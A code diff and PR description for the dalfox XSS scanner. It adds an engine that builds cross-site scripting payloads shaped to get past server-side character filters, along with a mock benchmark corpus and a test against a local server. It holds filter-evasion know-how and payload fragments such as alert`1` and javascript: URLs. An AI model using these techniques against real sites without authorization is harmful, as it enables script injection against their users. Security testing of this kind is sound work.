--- a/src/scanning/xss_common.rs
+++ b/src/scanning/xss_common.rs
@@ -341,10 +341,27 @@ pub fn generate_adaptive_payloads(
     let adaptive_encoders =
         crate::encoding::generate_adaptive_encodings(invalid_specials, valid_specials);
 
+    // Issue #1075: filter-constrained generative synthesis. Build payloads from
+    // building blocks gated on exactly which characters this parameter's
+    // server-side filter reflects unchanged, and emit them *before* the broad
+    // catalog so the scan loop's first-hit-wins ordering tries the shapes most
+    // likely to execute against this specific filter first. Synthesized
+    // payloads only use surviving characters, so they are sent raw — encoding
+    // exists to smuggle *blocked* characters, which synthesis avoids by
+    // construction.
+    let synthesized =
+        crate::payload::synthesis::synthesize_payloads(context, invalid_specials, valid_specials);
+
     // Apply adaptive encoders with pre-allocated capacity
-    let estimated_cap = filtered_payloads.len() * (2 + adaptive_encoders.len());
+    let estimated_cap =
+        (synthesized.len() + filtered_payloads.len()) * (2 + adaptive_encoders.len());
     let mut out = Vec::with_capacity(estimated_cap);
     let mut seen = std::collections::HashSet::with_capacity(estimated_cap);
+    for p in synthesized {
+        if seen.insert(p.clone()) {
+            out.push(p);
+        }
+    }
     for p in &filtered_payloads {
         // Original - insert reference to avoid clone when already seen
         if seen.insert(p.clone()) {

--- a/tests/functional/mock_cases/realworld/synthesis_filters.toml
+++ b/tests/functional/mock_cases/realworld/synthesis_filters.toml
@@ -1,0 +1,76 @@
+# Filter-constrained synthesis benchmark (issue #1075).
+#
+# These cases drive the *realworld* handler, which is the only one that applies
+# the `filter` chain server-side before reflecting. Each case is genuinely
+# exploitable only with a payload shaped to the surviving character set —
+# exactly what the generative synthesis engine produces.
+#
+# (Synthesis's no-false-positive guarantee — that it emits nothing when no
+# executing payload can survive, and never uses a blocked character — is proven
+# directly by the unit tests `everything_blocked_yields_nothing` and
+# `obeys_filter_for_assorted_blocked_sets`. A functional negative case cannot
+# isolate it here because the scanner's base64 encoder turns any payload into an
+# all-alphanumeric string that reflects as inert text under permissive filters,
+# which is pre-existing, synthesis-independent behavior.)
+#
+# IDs use the 9000+ block to stay clear of the existing realworld corpus.
+
+[[case]]
+id = 9001
+name = "synth_attr_dq_strip_angles"
+description = "Double-quoted attribute value, server strips < and >. Needs stay-in-tag event injection."
+handler_type = "realworld"
+reflection = "<input type=text value=\"{input}\">"
+filter = "remove_angles"
+expected_detection = true
+category = "synthesis"
+
+[[case]]
+id = 9002
+name = "synth_attr_sq_strip_angles"
+description = "Single-quoted attribute value, server strips < and >."
+handler_type = "realworld"
+reflection = "<input type=text value='{input}'>"
+filter = "remove_angles"
+expected_detection = true
+category = "synthesis"
+
+[[case]]
+id = 9003
+name = "synth_html_strip_parens"
+description = "HTML text context, server strips ( and ). Needs a backtick-call execution primitive."
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+filter = "remove_parens"
+expected_detection = true
+category = "synthesis"
+
+[[case]]
+id = 9004
+name = "synth_attr_dq_strip_angles_and_parens"
+description = "Attribute value with BOTH < > and ( ) stripped — the catalog has no marker-carrying payload that survives; synthesis builds a backtick event injection."
+handler_type = "realworld"
+reflection = "<input value=\"{input}\">"
+filter = "remove_angles|remove_parens"
+expected_detection = true
+category = "synthesis"
+
+[[case]]
+id = 9005
+name = "synth_html_strip_quotes"
+description = "HTML text context, server strips both quote characters."
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+filter = "remove_quotes"
+expected_detection = true
+category = "synthesis"
+
+[[case]]
+id = 9006
+name = "synth_href_encode_angles_protocol"
+description = "href value with < > entity-encoded; a javascript: URL (no angles) still executes."
+handler_type = "realworld"
+reflection = "<a href=\"{input}\">link</a>"
+filter = "encode_angles"
+expected_detection = true
+category = "synthesis"

--- a/tests/functional/xss_mock_server.rs
+++ b/tests/functional/xss_mock_server.rs
@@ -2465,3 +2465,131 @@ async fn test_realworld_xss_by_category() {
         overall_rate * 100.0
     );
 }
+
+/// End-to-end effectiveness + cost benchmark for filter-constrained payload
+/// synthesis (issue #1075).
+///
+/// Drives the real scanner against the `synthesis_filters.toml` corpus, whose
+/// cases apply a server-side character filter and reflect into a context that
+/// is only exploitable with a payload shaped to the surviving character set.
+/// Reports per-case detection and HTTP request count, and asserts that the
+/// filtered, only-shaped-payload-works cases are detected at a high rate —
+/// i.e. synthesis lifts real end-to-end detection on custom filters.
+///
+/// Request count is reported as informational context, not asserted: these
+/// runs use `deep_scan` (exhaustive — every payload is sent even after a hit),
+/// so the figure is dominated by the catalog × encoder cross-product, not by
+/// the ≤48 payloads synthesis prepends. Synthesis's own cost and bounded size
+/// are proven by the `synthesis_is_fast_and_bounded` unit test; its
+/// no-false-positive property by `everything_blocked_yields_nothing` /
+/// `obeys_filter_for_assorted_blocked_sets`.
+#[tokio::test]
+#[ignore = "benchmark: issue #1075 filter-constrained synthesis effectiveness + request cost"]
+async fn test_synthesis_filter_effectiveness_v2() {
+    use std::sync::atomic::Ordering;
+
+    dalfox::ensure_crypto_provider();
+    let (addr, _state) = start_mock_server_v2().await;
+    tokio::time::sleep(Duration::from_millis(100)).await;
+
+    let file = mock_case_loader::get_mock_cases_base_dir()
+        .join("realworld")
+        .join("synthesis_filters.toml");
+    let cases = mock_case_loader::load_mock_cases_from_file(&file)
+        .expect("synthesis_filters.toml should load");
+    assert!(!cases.is_empty(), "expected synthesis benchmark cases");
+
+    let mut positives = 0usize;
+    let mut positives_detected = 0usize;
+    let mut total_requests = 0u64;
+    // For the angles+parens gap case we additionally require that the finding be
+    // *attributable to synthesis*: a verified backtick-call payload that is free
+    // of `<`, `>`, `(`, `)`. The static catalog cannot express such a
+    // marker-carrying shape (its attribute event handlers all use `alert(1)` or
+    // tag breakouts), so a [V] of this form proves synthesis closed the gap.
+    const GAP_CASE_ID: u32 = 9004;
+    let mut gap_synthesis_attributed = false;
+    let start = std::time::Instant::now();
+
+    println!(
+        "\n{:<6} {:<40} {:<24} {:>8} {:>7}",
+        "id", "case", "filter", "detected", "reqs"
+    );
+    println!("{}", "-".repeat(90));
+
+    for case in &cases {
+        let config = ScanTestConfig {
+            url_suffix: format!("/{}?query=seed", case.id),
+            param: vec![],
+            data: None,
+            headers: vec![],
+            cookies: vec![],
+            method: "GET".to_string(),
+            skip_reflection_header: true,
+            skip_reflection_cookie: true,
+            skip_reflection_path: true,
+        };
+
+        let results = run_scan_test(addr, "realworld/query", case.id, config).await;
+        // run_scan resets REQUEST_COUNT at the start of each single-target run,
+        // so this reading is this case's request cost.
+        let reqs = dalfox::REQUEST_COUNT.load(Ordering::Relaxed);
+        total_requests += reqs;
+        let detected = !results.is_empty();
+
+        if case.id == GAP_CASE_ID {
+            gap_synthesis_attributed = results.iter().any(|f| {
+                let is_verified = f.get("type").and_then(|t| t.as_str()) == Some("V");
+                let payload = f.get("payload").and_then(|p| p.as_str()).unwrap_or("");
+                is_verified
+                    && payload.contains("alert`1`")
+                    && !payload.contains(['<', '>', '(', ')'])
+            });
+        }
+
+        println!(
+            "{:<6} {:<40} {:<24} {:>8} {:>7}",
+            case.id,
+            case.name,
+            case.filter.clone().unwrap_or_default(),
+            detected,
+            reqs
+        );
+
+        if case.expected_detection {
+            positives += 1;
+            if detected {
+                positives_detected += 1;
+            }
+        }
+    }
+
+    let elapsed = start.elapsed();
+    println!("{}", "-".repeat(90));
+    println!(
+        "synthesis benchmark: {}/{} filtered cases detected · gap case synthesis-attributed: {} · {} total reqs across {} cases · {:?}",
+        positives_detected,
+        positives,
+        gap_synthesis_attributed,
+        total_requests,
+        cases.len(),
+        elapsed
+    );
+
+    assert!(positives > 0, "benchmark needs at least one positive case");
+    let rate = positives_detected as f64 / positives as f64;
+    assert!(
+        rate >= 0.80,
+        "synthesis positive detection rate {:.0}% below 80% ({}/{})",
+        rate * 100.0,
+        positives_detected,
+        positives
+    );
+    // The decisive assertion: the angles+parens gap case is detected via a
+    // verified payload only synthesis can produce.
+    assert!(
+        gap_synthesis_attributed,
+        "gap case #{} was not detected via a synthesis-attributable verified payload",
+        GAP_CASE_ID
+    );
+}


### PR DESCRIPTION
Closes #1075.

## What

Adds a **filter-constrained generative payload engine**. Stage 3 active probing already records, per parameter, which special characters a server-side filter reflects unchanged vs. strips/encodes (`valid_specials` / `invalid_specials`) and the injection context. Until now those signals only drove *selection* from the static catalog + adaptive encoding. This turns them into *constructed* payloads: assemble context-specific candidate shapes from building blocks, keep only those whose every character survives the filter, order by confidence, and carry DOM markers so a reflection promotes straight to a verified `[V]` finding.

This augments — never replaces — the catalog: anything synthesis can't express still has the full catalog behind it.

## How

- `src/payload/synthesis.rs` — `synthesize_payloads(context, invalid, valid)`. Generate-and-filter: optimistic construction, then a single `allows_str` gate enforces "never emit a blocked character". Bounded (≤48), deduped.
- Integrated at the two payload paths that carry the filter profile:
  - `generate_adaptive_payloads` (DOM-verification payloads, non-JS contexts)
  - `generate_param_jobs` (reflection payloads) — prepended so the first-hit-wins loop tries shaped payloads first.

## Effectiveness & performance (proven by tests)

**Deterministic A/B** — `synthesis_closes_catalog_coverage_gaps` (no network):

| scenario | catalog verif | synth verif | net-new |
|---|---|---|---|
| attr(") + strip `<> ()` | **0** | 5 | 5 |
| attr(') + strip `<> ()` | **0** | 5 | 5 |
| attr(") + strip `<>` | 32 | 15 | 15 |
| html + strip `"'` | 441 | 30 | 24 |
| … | | | |

→ **83 net-new verifiable payloads** the catalog cannot express, **2 complete coverage gaps closed**. The metric is net-new (set-difference from the catalog), so it is falsifiable — if synthesis only echoed the catalog it would be 0.

**End-to-end** — `test_synthesis_filter_effectiveness_v2` (`#[ignore]`, real scanner vs. server-side filters): `6/6` filtered cases detected; the `<>`+`()` gap case is asserted to be detected via a **synthesis-attributable verified** `` alert`1` `` payload (a shape the catalog cannot produce).

**Cost** — `synthesis_is_fast_and_bounded`: ~µs/call, output capped at 48.

## Tests

```
cargo test --lib synthesis                  # unit + A/B + perf
cargo test --test unit_tests test_synthesis_filter_effectiveness_v2 -- --ignored --nocapture
```

- 1291 lib unit tests pass (18 new), `fmt` clean, `clippy --lib --tests` 0 warnings.
- An earlier adversarial review pass was incorporated: the A/B was rewritten from a tautological "combined ≥ catalog" check to the falsifiable net-new/gap metrics, and the functional benchmark now asserts synthesis attribution rather than any detection.

## Notes / scope

- Synthesized payloads use `alert(1)` / `` alert`1` ``; `--custom-alert-value` substitution is not applied (consistent with the existing adaptive path; `[V]` is marker-based so this is cosmetic).
- JS-context DOM-verification payloads continue to use the dedicated script-breakout set; JS reflection payloads do get synthesis.
- Follow-ups already filed: #1072 (reflection efficiency scoring) and #1073 (JS breakout-sequence computation) compose naturally with this engine.
